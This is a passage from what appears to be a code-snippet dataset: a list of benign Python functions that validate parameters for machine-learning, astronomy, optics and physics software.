self.configs['num_decoder_layers']\n if not num_enc_layers or not num_dec_layers:\n raise ValueError(\n \"num_encoder_layers and num_decoder_layers must be greater than 0.\")\n if num_enc_layers != num_dec_layers:\n self.configs['pass_hidden_state'] = False\n\n if enc_type == \"bi\" and num_enc_layers % 2 != 0:\n raise ValueError(\n \"num_encoder_layers must be even when encoder_type is %s.\" % enc_type)\n\n attn_arch = self.configs.get('attention_architecture', None)\n if attn_arch in [\"gnmt\"] and num_enc_layers < 2:\n raise ValueError(\"For gnmt attention architecture, \"\n \"num_encoder_layers: %d should be >= 2.\" %\n num_enc_layers)\n\n infer_mode = self.configs['infer_mode']\n beam_width = self.configs.get(\"beam_width\", 0)\n if infer_mode == \"beam_search\" and beam_width <= 0:\n raise ValueError(\"beam_width must be > 0 if infer_mode is `beam_search`.\")\n\n sample_temp = self.configs.get(\"sampling_temperature\", 0.0)\n if infer_mode == \"sample\" and sample_temp <= 0.0:\n raise ValueError(\n \"sampling_temperature must greater than 0.0 using sample decode.\")\n\n subword_option = self.configs['subword_option']\n if subword_option not in ['', 'bpe', 'spm']:\n raise ValueError(\"subword_option must be one of ['','bpe','spm']\")\n\n num_enc_residual_layers = 0\n num_dec_residual_layers = 0\n if self.configs['residual']:\n if num_enc_layers > 1:\n num_enc_residual_layers = num_enc_layers - 1\n if num_dec_layers > 1:\n num_dec_residual_layers = num_dec_layers - 1\n\n if enc_type == \"gnmt\":\n num_enc_residual_layers = num_enc_layers - 2\n if num_enc_layers == num_dec_layers:\n num_dec_residual_layers = num_enc_residual_layers\n\n self.configs['num_encoder_residual_layers'] = num_enc_residual_layers\n self.configs['num_decoder_residual_layers'] = num_dec_residual_layers", "def validate_parameters(side_1, side_2, side_3):\n if side_1 > 0 and side_2 > 0 and side_3 > 0 and (side_1 + side_2 > side_3) and \\\n (side_1 + side_3 > side_2) and (side_3 + side_2 > side_1):\n return True\n else:\n return False", "def checkParameters(self):\n EDVerbose.DEBUG(\"EDPluginExecVideov10.checkParameters\")\n self.checkMandatoryParameters(self.getDataInput(), \"Data Input is None\")\n self.checkMandatoryParameters(self.getDataInput().getInputImagePath(), \"inputImage list is None\")\n for oneXSDataFile in self.getDataInput().getInputImagePath():\n self.checkMandatoryParameters(oneXSDataFile.getPath().getValue(), \"input Image does not exist\" + oneXSDataFile.marshal())", "def 
_assert_correct_params(external_obj, param_attr, params):\n if type(params) == dict:\n for param in params.keys():\n npt.assert_allclose(\n getattr(external_obj, param_attr)['A'][param], params[param])\n if type(params) == tuple:\n npt.assert_allclose(getattr(external_obj, param_attr)['A'], params)", "def _check_is_fitted(self):\n check_is_fitted(self, ['w', 'b'])", "def _assert_validity_of_inputs(self):\n for item in [\"frequency\", \"Dt\", \"gain\", \"gain_imu\", \"gain_marg\"]:\n if isinstance(self.__getattribute__(item), bool):\n raise TypeError(f\"Parameter '{item}' must be numeric.\")\n if not isinstance(self.__getattribute__(item), (int, float)):\n raise TypeError(f\"Parameter '{item}' is not a non-zero number.\")\n if self.__getattribute__(item) <= 0.0:\n raise ValueError(f\"Parameter '{item}' must be a non-zero number.\")\n if self.q0 is not None:\n if not isinstance(self.q0, (list, tuple, np.ndarray)):\n raise TypeError(f\"Parameter 'q0' must be an array. Got {type(self.q0)}.\")\n self.q0 = np.copy(self.q0)\n if self.q0.shape != (4,):\n raise ValueError(f\"Parameter 'q0' must be an array of shape (4,). It is {self.q0.shape}.\")\n if not np.allclose(np.linalg.norm(self.q0), 1.0):\n raise ValueError(f\"Parameter 'q0' must be a versor (norm equal to 1.0). Its norm is equal to {np.linalg.norm(self.q0)}.\")", "def check_mode(params, thorough=False, tol=1e-5):\r\n N = len(params['d_list'])\r\n w = params['w']\r\n kx = params['kx']\r\n kz_list = params['kz_list']\r\n ex_list = params['ex_list']\r\n ez_list = params['ez_list']\r\n mu_list = params['mu_list']\r\n layer_bottom_list = params['layer_bottom_list']\r\n Sx_list = params['Sx_list']\r\n Sx_total = params['Sx_total']\r\n \r\n # check boundary conditions for Ex, Ez, Hy\r\n for layer_under in range(0,N-1):\r\n layer_over = layer_under + 1\r\n z = layer_bottom_list[layer_over]\r\n ez_under = ez_list[layer_under]\r\n ez_over = ez_list[layer_over]\r\n \r\n a = Ex(z, params, layer=layer_under)\r\n b = Ex(z, params, layer=layer_over)\r\n if not floats_are_equal(a,b,tol):\r\n return 'Ex b.c. error @ layer ' + str(layer_under) + ' - ' + str((a,b))\r\n a = ez_under * Ez(z, params, layer=layer_under)\r\n b = ez_over * Ez(z, params, layer=layer_over)\r\n if not floats_are_equal(a,b,tol):\r\n return 'Ez b.c. error @ layer ' + str(layer_under) + ' - ' + str((a,b))\r\n a = Hy(z, params, layer=layer_under)\r\n b = Hy(z, params, layer=layer_over)\r\n if not floats_are_equal(a,b,tol):\r\n return 'Hy b.c. error @ layer ' + str(layer_under) + ' - ' + str((a,b))\r\n \r\n # check a few properties of each layer\r\n for i in range(N):\r\n kz = kz_list[i]\r\n ez = ez_list[i]\r\n ex = ex_list[i]\r\n mu = mu_list[i]\r\n assert_floats_are_equal(kz**2,\r\n w**2 * mu * ex / nu.c0**2 - kx**2 * ex /ez,\r\n tol=1e-8)\r\n assert kz.imag >= 0\r\n \r\n if (i == 0 or i == N-1) and kz.imag == 0:\r\n return 'kz indicates non-confined wave @ layer ' + str(i)\r\n \r\n if thorough:\r\n # Check Sx_list against a numerical integration. This really just tests\r\n # whether I made a stupid mistake in calculus or algebra, it should\r\n # always pass even for non-modes.\r\n \r\n # Numerical integration expects order-unity integrand, or else the\r\n # absolute-error criterion can fire before convergence. (A few orders\r\n # of magnitude away from 1 is OK, but not 20 orders of magnitude.) So\r\n # I'll scale up before integrating, then scale down by the same factor\r\n # afterwards. 
Poor integration can flag a correct solution as incorrect,\r\n # but not vice-versa: If it passes the test, you can trust it.\r\n \r\n # This scale_factor seems to work pretty reliably\r\n scale_factor = max(abs(Sx(0, params, layer=0)),\r\n abs(Sx(0, params, layer=1)))\r\n assert scale_factor != 0\r\n for i in range(N):\r\n # Calculate integration limits\r\n if i != 0:\r\n lower_z = layer_bottom_list[i]\r\n else:\r\n lower_z = -20 / abs(kz_list[i].imag)\r\n if i != N-1:\r\n upper_z = layer_bottom_list[i+1]\r\n else:\r\n upper_z = 20 / abs(kz_list[i].imag)\r\n \r\n integrand_re = lambda z : (Sx(z, params, layer=i) / scale_factor).real\r\n integrand_im = lambda z : (Sx(z, params, layer=i) / scale_factor).imag\r\n Sx_integrated = (scipy.integrate.quad(integrand_re, lower_z, upper_z)[0]\r\n + 1j * scipy.integrate.quad(integrand_im, lower_z, upper_z)[0])\r\n Sx_integrated *= scale_factor\r\n assert_floats_are_equal(Sx_list[i], Sx_integrated, tol=1e-5)\r\n assert_floats_are_equal(Sx_total, sum(Sx_list), tol=1e-8)\r\n \r\n # All tests passed!\r\n return True", "def _check_params(self):\n if self.k_initial <= 0 :\n raise ValueError('Initial K should be 1 or more.')", "def test_verify(perfectModelEnsemble_initialized_control):\n assert perfectModelEnsemble_initialized_control.verify(\n metric=\"mse\", comparison=\"m2e\", dim=[\"init\", \"member\"]\n )", "def check_model_sanity(models):\n if not isinstance(models, (list, tuple)):\n models = [models]\n\n for _model in models:\n if not hasattr(_model, \"predict\"):\n raise AttributeError(\"Model require `predict` method.\")\n\n if not hasattr(_model, \"predict_prob\"):\n raise AttributeError(\"Model require `predict_proba` method.\")\n\n return True", "def validate_params(self) -> None:\n if isinstance(self.hamiltonian, PauliSumOp) and isinstance(\n self.hamiltonian.coeff, ParameterExpression\n ):\n raise ValueError(\"A global parametrized coefficient for PauliSumOp is not allowed.\")", "def checkParameters(self):\n self.DEBUG(\"EDPluginExecDatcmpv2_0.checkParameters\")\n self.checkMandatoryParameters(self.getDataInput(), \"Data Input is None\")\n self.checkMandatoryParameters(self.getDataInput().inputCurve, \"No input 1D curves file provided\")", "def validateInputParams(self): \n # Return dictionary\n retval = {}\n retval['status'] = True\n retval['axis'] = ''\n \n # Get the separationaxis of input MMS. 
\n sepaxis = ph.axisType(self.__args['vis'])\n if sepaxis.isspace() or sepaxis.__len__() == 0:\n sepaxis = 'unknown'\n elif sepaxis == 'scan,spw':\n sepaxis = 'auto'\n \n #Get list of subMSs in MMS\n subMSList = ParallelTaskHelper.getReferencedMSs(self.__args['vis'])\n \n if self.__taskname == \"mstransform\":\n \n if (self.__args['combinespws'] == True or self.__args['nspw'] > 1) and \\\n (self.__args['timeaverage'] == False):\n spwsel = self.__getSpwIds(self.__args['vis'], self.__args['spw']) \n # Get dictionary with spwids of all subMS in the MMS\n spwdict = ph.getScanSpwSummary(subMSList) \n # For each subMS, check if it has the spw selection\n for subms in subMSList:\n subms_spwids = ph.getSubMSSpwIds(subms, spwdict)\n slist = map(str,subms_spwids)\n # Check if the subms contains all the selected spws\n if not self.__isSpwContained(spwsel, slist):\n casalog.post('Cannot combine or separate spws in parallel because the subMSs do not contain all the selected spws',\\\n 'WARN')\n # Set the new separation axis for the output\n retval['status'] = False\n retval['axis'] = 'scan'\n break\n \n elif (self.__args['timeaverage'] == True and self.__args['timespan'] == 'scan') and \\\n (self.__args['combinespws'] == False and self.__args['nspw'] == 1):\n # Get the value of timebin as a float\n timebin = self.__args['timebin']\n tsec = qa.quantity(timebin,'s')['value']\n scansel = self.__getScanIds(self.__args['vis'], self.__args['scan'])\n # For each subms, check if scans length is <= timebin\n for subms in subMSList:\n if not self.__isScanContained(subms, scansel, tsec):\n casalog.post('Cannot process MMS in parallel when timespan=\\'scan\\' because the subMSs do not contain all the selected scans',\\\n 'WARN')\n # Set the new separation axis for the output\n retval['status'] = False\n retval['axis'] = 'spw'\n break\n \n # Two transformations are requested.\n elif (self.__args['combinespws'] == True or self.__args['nspw'] > 1) and \\\n (self.__args['timeaverage'] == True and self.__args['timespan'] == 'scan'):\n # Check spws and scans in subMSs\n spwsel = self.__getSpwIds(self.__args['vis'], self.__args['spw'])\n spwdict = ph.getScanSpwSummary(subMSList) \n scansel = self.__getScanIds(self.__args['vis'], self.__args['scan'])\n timebin = self.__args['timebin']\n tsec = qa.quantity(timebin,'s')['value']\n for subms in subMSList:\n subms_spwids = ph.getSubMSSpwIds(subms, spwdict)\n slist = map(str,subms_spwids)\n if self.__isSpwContained(spwsel, slist):\n if not self.__isScanContained(subms, scansel, tsec):\n casalog.post('The subMSs of input MMS do not contain the necessary scans','WARN')\n retval['status'] = False\n retval['axis'] = ''\n break \n else:\n casalog.post('The subMSs of input MMS do not contain the necessary spws','WARN')\n retval['status'] = False\n retval['axis'] = ''\n break\n \n \n elif self.__taskname == \"split2\" or self.__taskname == \"split\": \n if (sepaxis != 'spw' and self.__args['combine'] == 'scan'):\n scansel = self.__getScanIds(self.__args['vis'], self.__args['scan'])\n timebin = self.__args['timebin']\n tsec = qa.quantity(timebin,'s')['value']\n for subms in subMSList:\n if not self.__isScanContained(subms, scansel, tsec):\n casalog.post('Cannot process MMS in parallel when combine=\\'scan\\' because the subMSs do not contain all the selected scans',\\\n 'WARN')\n casalog.post(\"Please set keepmms to False or use task mstransform in this case.\",'ERROR')\n retval['status'] = False\n retval['axis'] = ''\n break\n\n elif self.__taskname == \"cvel2\" and sepaxis != 
'scan':\n spwsel = self.__getSpwIds(self.__args['vis'], self.__args['spw']) \n spwdict = ph.getScanSpwSummary(subMSList) \n for subms in subMSList:\n subms_spwids = ph.getSubMSSpwIds(subms, spwdict)\n slist = map(str,subms_spwids)\n # Check if the subms contains all the selected spws\n if not self.__isSpwContained(spwsel, slist):\n casalog.post('Cannot combine spws in parallel because the subMSs do not contain all the selected spws',\\\n 'WARN')\n casalog.post(\"Please set keepmms to False or use task mstransform in this case.\",'ERROR')\n # Set the new separation axis for the output\n retval['status'] = False\n retval['axis'] = ''\n break\n \n\n return retval", "def _is_parameters_ok(self):\n\n if self.configuration['mpd_url'] is None:\n raise InvalidParameterException(\"MPD needs a url\")\n\n if self.configuration['mpd_action'] is None:\n raise InvalidParameterException(\"MPD needs an action\")\n elif self.configuration['mpd_action'] in ['playlist', 'playlist_spotify', 'search', 'file'] \\\n and self.configuration['query'] is None:\n raise InvalidParameterException(\"MPD requires a query for this action\")\n\n return True", "def checkNeededParams(self):\n for clp,value in self.neededParamsNames.items():\n if value[0] not in self.neededParams:\n print >> sys.stderr, clp+\" is a mandatory parameter \"\n self.printUsage()\n sys.exit(1)", "def check_constraints(Px,pk1,pk2,mu1,mu2,mu3):\n # Constraint 1: Check polarisation basis probabilities are valid.\n if (Px >= 1.0 or Px <= 0.0):\n print(\"Error! Constraint 1 < Px < 0: \", Px)\n exit(1)\n # Constraint 2: Check probability of pulse with intensity 1 is in bounds.\n if (pk1 >= 1.0 or pk1 <= 0.0):\n print(\"Error! Constraint 1 < pk1 < 0: \", pk1)\n exit(1)\n # Constraint 3: Check probability of pulse with intensity 2 is in bounds.\n if (pk2 >= 1.0 or pk2 <= 0.0):\n print(\"Error! Constraint 1 < pk2 < 0: \", pk2)\n exit(1)\n # Constraint 4: Check sum of probabilities for intensity 1 & 2 are less\n # than unity.\n if ((pk1 + pk2) >= 1.0):\n print(\"Error! Constraint (pk1 + pk2) < 1: \", pk1 + pk2)\n exit(1)\n # Constraint 5: Check value of intensity 1 is in bounds.\n if (mu1 >= 1.0 or mu1 <= 0.0):\n print(\"Error! Constraint 1 < mu1 < 0: \", mu1)\n exit(1)\n # Constraint 6: Check value of intensity 2 is in bounds.\n if (mu2 >= 1.0 or mu2 <= 0.0):\n print(\"Error! Constraint 1 < mu2 < 0: \", mu2)\n exit(1)\n # Constraint 7: Check values of all intensities are in bounds.\n if ((mu1 - mu3) <= mu2):\n print(\"Error! Constraint (mu1-mu3) > mu2: \", (mu1-mu3), mu2)\n exit(1)\n # Constraint 8: Check values of intensities 2 & 3 are in bounds.\n if (mu2 <= mu3):\n print(\"Error! 
Constraint mu2 > mu3: \", mu2, mu3)\n exit(1)\n return None", "def _mixed_precision_enabled_for_params(self) -> bool:\n return self.mixed_precision.param_dtype is not None", "def is_mvmm(estimator):\n if isinstance(estimator, MultiViewMixtureModelMixin) or \\\n isinstance(estimator, MVMMGridSearch) or \\\n isinstance(estimator, TwoStage) or \\\n isinstance(estimator, SpectralPenSearchByBlockMVMM):\n # isinstance(estimator, SpectralPenSearchMVMM) or \\\n\n return True\n else:\n return False", "def test_find_best_model(self):\n parameters = dict(\n model=('spherical', 'gaussian', 'exponential', 'matern')\n )\n gs = GridSearchCV(\n VariogramEstimator(n_lags=15, normalize=False),\n parameters,\n cv=3\n )\n\n gs = gs.fit(self.c, self.v)\n\n # Python 3.6 yields 'exponential', \n # while 3.7, 3.8 yield 'gaussian' - this is so stupid\n self.assertTrue(gs.best_params_['model'] in ['gaussian', 'exponential'])", "def set_parameters_selected(self, p):\n if len(p) == len(self.parameters):\n # The vector have compatible dimensions\n i = 0\n for par in self.parameters:\n self.fmu.set_real(par.value_reference, p[i])\n i += 1\n return True\n else:\n # the vectors are not compatibles\n logger.error(\"The vector containing the parameters to set is not compatible with the number of parameters selected\")\n logger.error(\"{0} vs {1}\".format(len(p), len(self.parameters)))\n return False", "def check_params(params):\n\n required = ['initlandmarks']\n for r in required:\n assert r in params.keys(), 'Params must include {}'.format(r)", "def _update_model_params(self, params, model_ID, model, param_grid):\n \n params = params.copy()\n param_grid = param_grid.copy()\n \n params_transform = {}\n \n for key in params.keys():\n \n if 'log10.' in key:\n log10_transform = True\n else:\n log10_transform = False\n \n key = key.replace('log10.','')\n \n type_str = str(type(param_grid[key][0]))\n \n if 'int' in type_str: \n if log10_transform:\n params_transform[key] = int(10**params['log10.'+key])\n else:\n params_transform[key] = int(params[key])\n \n elif 'float' in type_str:\n if log10_transform:\n params_transform[key] = float(10**params['log10.'+key])\n \n else:\n params_transform[key] = float(params[key])\n \n elif 'str' in type_str: #index the param grid for hyperparams using 'choice'\n params_transform[key] = param_grid[key][params[key]]\n \n if 'densenet' not in model_ID.lower(): \n model.__dict__[key] = params_transform[key]\n \n assert(type_str == str(type(params_transform[key]))), 'type(param_grid[key][0]) changed from '+type_str+' to '+str(type(param_grid[key][0]))+' after updating params for key:'+str(key)\n \n if 'str' in type_str:\n assert(params_transform[key] in param_grid[key]), 'params_transform['+key+']='+str(params_transform[key])+' is not in the list of valid parameter choices:'+str(param_grid[key])\n \n else:\n assert(params_transform[key]<=max(param_grid[key]) and params_transform[key]>=min(param_grid[key])), 'params_transform['+key+']='+str(params_transform[key])+' does not lie in the range of valid values:'+str([min(param_grid[key]),max(param_grid[key])] )\n \n if 'densenet' in model_ID.lower(): \n model = model(**params_transform)\n \n return params_transform, model", "def test_parameters(self):\n assert self.hll.p == 8\n assert self.hll.m == 256\n assert round(self.hll.alpha - 0.7182725932495458, 5) == 0\n assert round(self.hll.error - 0.065, 5) == 0\n assert self.hll64.treshold == 120000", "def checkParameters(self):\n self.DEBUG(\"EDPluginControlStitchImagev1_0.checkParameters\")\n 
self.checkMandatoryParameters(self.getDataInput(), \"Data Input is None\")\n self.checkMandatoryParameters(self.getDataInput().getInputImages(), \"No input Images\")", "def parameter_check(coordinates, \n neighbors, \n bandwidth, \n convergence, \n percentage):\n # Create a boolean vector to keep track of incorrect inputs\n incorrect_inputs = np.zeros(5, dtype = bool)\n # Check whether two-dimensional coordinates are provided\n if not type(coordinates) == np.ndarray:\n incorrect_inputs[0] = True\n elif not coordinates.shape[1] == 2:\n incorrect_inputs[0] = True\n # Check whether neighbors is a positive integer or float\n if not ((type(neighbors) == int and neighbors > 0)\n and not ((type(neighbors) == float) \n and (neighbors > 0)\n and (neighbors.is_integer() == True))):\n incorrect_inputs[1] = True\n # Check whether bandwidth is a positive integer or float\n if not bandwidth == None:\n if not ((type(bandwidth) == int and bandwidth > 0)\n or (type(bandwidth) == float) and bandwidth > 0):\n incorrect_inputs[2] = True\n # Check whether convergence is a positive integer or float\n if not convergence == None:\n if not ((type(convergence) == int and convergence > 0)\n or (type(convergence) == float) and convergence > 0):\n incorrect_inputs[3] = True\n # Check whether percentage is a valid percentage value\n if not percentage == None:\n if not ((type(percentage) == int and percentage >= 0 \n and percentage <= 100)\n or ((type(percentage) == float) and percentage >= 0 \n and percentage <= 100)):\n incorrect_inputs[4] = True\n # Define error messages for each parameter failing the tests\n errors = ['ERROR: coordinates: Must be a 2-column numpy.ndarray',\n 'ERROR: neighbors: Must be a whole-number int or float > 0',\n 'ERROR: bandwidth: Must be an int or float > 0, or None',\n 'ERROR: convergence: Must be an int or float > 0, or None',\n 'ERROR: percentage: Must be an int or float in [0, 100], or None']\n # Print eventual error messages and terminate the code\n if any(value == True for value in incorrect_inputs):\n for i in range(0, len(errors)):\n if incorrect_inputs[i] == True:\n print(errors[i])\n sys.exit()", "def _check_param(in_params, req_param, opt_param=list()):\n for param in req_param:\n if param not in in_params:\n raise ValueError('{} parameter is required'.format(param))\n defined_param = set(req_param + opt_param)\n for param in in_params:\n if param not in defined_param:\n print(\n \"WARNING: received unexpected parameter {}\".format(param))", "def validate_system(self):\n if bool(self.optical_system):\n for material in self.optical_system.materials:\n sig = set(material.keys())\n required = self.material_signature\n if not (sig >= required):\n raise RuntimeError(\n f\"Optical engine failed materials signature check. \"\n f\"System signature is {sig} but needed {required}\"\n )\n \n if self.dimension == 2:\n if bool(self.optical_system._amalgamated_sources):\n sig = set(self.optical_system._amalgamated_sources.keys())\n required = SEGMENT_GEO_SIG | self.input_signature\n if not (sig >= required):\n raise RuntimeError(\n f\"Optical engine failed sources signature check. System \" \n f\"signature is {sig}, but needed {required}.\"\n )\n if bool(self.optical_system._amalgamated_optical_segments):\n sig = set(self.optical_system._amalgamated_optical_segments.keys())\n required = SEGMENT_GEO_SIG | self.optical_signature\n if not (sig >= required):\n raise RuntimeError(\n f\"Optical engine failed optical segments signature check. 
\"\n f\"System signature is {sig}, but needed {required}.\"\n )\n if bool(self.optical_system._amalgamated_optical_arcs):\n sig = set(self.optical_system._amalgamated_optical_arcs.keys())\n required = ARC_GEO_SIG | self.optical_signature\n if not (sig >= required):\n raise RuntimeError(\n f\"Optical engine failed optical arcs signature check. \"\n f\"System signature is {sig}, but needed {required}.\"\n )\n if bool(self.optical_system._amalgamated_stop_segments):\n sig = set(self.optical_system._amalgamated_stop_segments.keys())\n required = SEGMENT_GEO_SIG | self.stop_signature\n if not (sig >= required):\n raise RuntimeError(\n f\"Optical engine failed stop segments signature check. \"\n f\"System signature is {sig}, but needed {required}.\"\n )\n if bool(self.optical_system._amalgamated_stop_arcs):\n sig = set(self.optical_system._amalgamated_stop_arcs.keys())\n required = ARC_GEO_SIG | self.stop_signature\n if not (sig >= required):\n raise RuntimeError(\n f\"Optical engine failed stop arcs signature check. \"\n f\"System signature is {sig}, but needed {required}.\"\n )\n if bool(self.optical_system._amalgamated_target_segments):\n sig = set(self.optical_system._amalgamated_target_segments.keys())\n required = SEGMENT_GEO_SIG | self.target_signature\n if not (sig >= required):\n raise RuntimeError(\n f\"Optical engine failed target segments signature check. \"\n f\"System signature is {sig}, but needed {required}.\"\n )\n if bool(self.optical_system._amalgamated_target_arcs):\n sig = set(self.optical_system._amalgamated_target_arcs.keys())\n required = ARC_GEO_SIG | self.target_signature\n if not (sig >= required):\n raise RuntimeError(\n f\"Optical engine failed target arcs signature check. \"\n f\"System signature is {sig}, but needed {required}.\"\n )\n else: # dimension == 3\n if bool(self.optical_system._amalgamated_sources):\n sig = set(self.optical_system._amalgamated_sources.keys())\n required = SOURCE_3D_SIG | self.input_signature\n if not (sig >= required):\n raise RuntimeError(\n f\"Optical engine failed sources signature check. System \" \n f\"signature is {sig}, but needed {required}.\"\n )\n if bool(self.optical_system._amalgamated_optical):\n sig = set(self.optical_system._amalgamated_optical.keys())\n required = TRIANGLE_GEO_SIG | self.optical_signature\n if not (sig >= required):\n raise RuntimeError(\n f\"Optical engine failed optical segments signature check. \"\n f\"System signature is {sig}, but needed {required}.\"\n )\n if bool(self.optical_system._amalgamated_stop):\n sig = set(self.optical_system._amalgamated_stop.keys())\n required = TRIANGLE_GEO_SIG | self.stop_signature\n if not (sig >= required):\n raise RuntimeError(\n f\"Optical engine failed stop segments signature check. \"\n f\"System signature is {sig}, but needed {required}.\"\n )\n if bool(self.optical_system._amalgamated_target):\n sig = set(self.optical_system._amalgamated_target.keys())\n required = TRIANGLE_GEO_SIG | self.target_signature\n if not (sig >= required):\n raise RuntimeError(\n f\"Optical engine failed target segments signature check. 
\"\n f\"System signature is {sig}, but needed {required}.\"\n )\n else:\n print(\"No optical system found, so validating nothing.\")", "def is_valid(self,):\r\n return self.g > 0 and self.l > 0 and self.m1 > 0 and self.m2 > 0 and self.m3 > 0 and self.r1 > 0 and self.r2 > 0 and self.tau > 0 and self.theta1 > 0 and self.theta2 > 0 and self.theta3 > 0", "def check_variables(self, model):\n for rhs_var in model.rhs.keys():\n if rhs_var.name in model.variables.keys():\n var = model.variables[rhs_var.name]\n\n different_shapes = not np.array_equal(\n model.rhs[rhs_var].shape, var.shape\n )\n\n not_concatenation = not isinstance(var, pybamm.Concatenation)\n\n not_mult_by_one_vec = not (\n isinstance(\n var, (pybamm.Multiplication, pybamm.MatrixMultiplication)\n )\n and (\n pybamm.is_matrix_one(var.left)\n or pybamm.is_matrix_one(var.right)\n )\n )\n\n if different_shapes and not_concatenation and not_mult_by_one_vec:\n raise pybamm.ModelError(\n \"variable and its eqn must have the same shape after \"\n \"discretisation but variable.shape = \"\n \"{} and rhs.shape = {} for variable '{}'. \".format(\n var.shape, model.rhs[rhs_var].shape, var\n )\n )", "def _check_parameters(self, p, integral=False, name=None, sym=None):\n for h in range(self._.d + 1):\n for i in range(self._.d + 1):\n for j in range(self._.d + 1):\n p[h, i, j] = ASParameters. \\\n _check_parameter(h, i, j, p[h, i, j],\n integral=integral,\n name=name, sym=sym)", "def verify(self):\n errors = []\n\n if not self.parameters:\n errors.append(\n VerifierError(\n subject=self,\n global_error=\"The MCO has no defined parameters\",\n )\n )\n\n if not self.kpis:\n errors.append(\n VerifierError(\n subject=self, global_error=\"The MCO has no defined KPIs\"\n )\n )\n\n for parameter in self.parameters:\n errors += parameter.verify()\n\n for kpi in self.kpis:\n errors += kpi.verify()\n\n return errors", "def validate_params(self) -> None:\n # cap must be given when using logistic growth\n if (self.growth == \"logistic\") and (self.cap is False):\n msg = \"Capacity must be provided for logistic growth\"\n logging.error(msg)\n raise ValueError(msg)\n\n # If custom_seasonalities passed, ensure they contain the required keys.\n reqd_seasonality_keys = [\"name\", \"period\", \"fourier_order\"]\n if not all(\n req_key in seasonality\n for req_key in reqd_seasonality_keys\n for seasonality in self.custom_seasonalities\n ):\n msg = f\"Custom seasonality dicts must contain the following keys:\\n{reqd_seasonality_keys}\"\n logging.error(msg)\n raise ValueError(msg)\n\n # If extra_regressors passed, ensure they contain the required keys.\n all_regressor_keys = {\"name\", \"prior_scale\", \"mode\"}\n for regressor in self.extra_regressors:\n if not isinstance(regressor, dict):\n msg = f\"Elements in `extra_regressor` should be a dictionary but receives {type(regressor)}.\"\n _error_msg(msg)\n if \"name\" not in regressor:\n msg = \"Extra regressor dicts must contain the following keys: 'name'.\"\n _error_msg(msg)\n if not set(regressor.keys()).issubset(all_regressor_keys):\n msg = f\"Elements in `extra_regressor` should only contain keys in {all_regressor_keys} but receives {regressor.keys()}.\"\n _error_msg(msg)\n self._reqd_regressor_names = [\n regressor[\"name\"] for regressor in self.extra_regressors\n ]\n # check floor and cap\n if (self.cap is not False) and (\"cap\" not in self._reqd_cap_floor_names):\n self._reqd_cap_floor_names.append(\"cap\")\n if self.floor is not False and (\"floor\" not in self._reqd_cap_floor_names):\n 
self._reqd_cap_floor_names.append(\"floor\")", "def check_config(params, dannce_net, prediction):\n check_camnames(params)\n\n if params[\"exp\"] is not None:\n for expdict in params[\"exp\"]:\n check_camnames(expdict)\n\n if dannce_net:\n check_net_expval(params)\n check_vmin_vmax(params)", "def doParametersOfInterest(self):\n ''' ref : physicsmodel -> rvf\n self.modelBuilder.out.var(\"MH\").setRange(float(self.mHRange[0]),float(self.mHRange[1]))\n self.modelBuilder.out.var(\"MH\").setConstant(False)\n '''\n\n self.modelBuilder.doVar(\"mu[0,0,1000]\") ##mu is what we want to return (in string) name[starting_value,min,max] \n self.modelBuilder.doVar(\"Fvbf[0,0,1]\") ##mu is what we want to return (in string) name[starting_value,min,max] \n self.modelBuilder.doSet(\"POI\",\"mu,Fvbf\")\n self.modelBuilder.doVar(\"\")\n self.modelBuilder.factory_('expr::ggH_s_func(\"(@0-sqrt(@0))*(1.-@1)\", mu,Fvbf)')\n self.modelBuilder.factory_( 'expr::ggH_b_func(\"(1-sqrt(@0))*(1.-@1)\", mu,Fvbf)')\n self.modelBuilder.factory_( 'expr::ggH_sbi_func(\"sqrt(@0)*(1.-@1)\", mu,Fvbf)')\n\n self.modelBuilder.factory_('expr::vbfH_s_func(\"(@0-sqrt(@0))*(@1)\", mu,Fvbf)')\n self.modelBuilder.factory_( 'expr::vbfH_b_func(\"(1-sqrt(@0))*(@1)\", mu,Fvbf)')\n self.modelBuilder.factory_( 'expr::vbfH_sbi_func(\"sqrt(@0)*(@1)\", mu,Fvbf)')", "def check_all_parameters(self):\n global dtParameterDesc\n self.message = ''\n ok = True\n for par in self.parameters:\n if par in dtParameterDesc:\n pardata = dtParameterDesc[par]\n check = self.check_parameter(par, self.parameters[par])\n ok = ok and check\n if not check:\n self.message += ('\\n' if self.message != '' else '') + pardata[dtg.LANG] +\\\n (' вне диапазона' if dtg.LANG == 'ru' else ' out of range')\n\n return ok", "def checkParameters(self):\n self.DEBUG(\"EDPluginWaitMultiFile.checkParameters\")\n self.checkMandatoryParameters(self.dataInput, \"Data Input is None\")\n self.checkMandatoryParameters(self.dataInput.expectedFile, \"Data Input is None\")\n self.checkMandatoryParameters(self.dataInput.expectedSize, \"Data Input is None\")", "def _check_params(self):\n\n # verify that estimator1 and estimator2 have predict_proba\n if (not hasattr(self.estimator1_, 'predict_proba') or\n not hasattr(self.estimator2_, 'predict_proba')):\n raise AttributeError(\"Co-training classifier must be initialized \"\n \"with classifiers supporting \"\n \"predict_proba().\")\n\n if (self.p_ is not None and self.p_ <= 0) or (self.n_ is not None and\n self.n_ <= 0):\n raise ValueError(\"Both p and n must be positive.\")\n\n if self.unlabeled_pool_size <= 0:\n raise ValueError(\"unlabeled_pool_size must be positive.\")\n\n if self.num_iter <= 0:\n raise ValueError(\"num_iter must be positive.\")", "def check_parameters():\r\n for par in PARAM:\r\n if isinstance(par, ExperimentFrame):\r\n EXP.change_variable(**par())\r\n else:\r\n EXP.change_variable(**par)", "def _is_parameters_ok(self):\n if self.api_key is None:\n raise MissingParameterException(\"OpenWeatherMap neuron needs an api_key\")\n if self.location is None:\n raise MissingParameterException(\"OpenWeatherMap neuron needs a location\")\n\n return True", "def _is_parameters_ok(self):\n if self.api_key is None:\n raise MissingParameterException(\"OpenWeatherMap neuron needs an api_key\")\n if self.location is None:\n raise MissingParameterException(\"OpenWeatherMap neuron needs a location\")\n\n return True", "def validate_matrix(self, data, **kwargs):\n validate_matrix(data.get(\"params\"))", "def check(self):\n\n Rbo = 
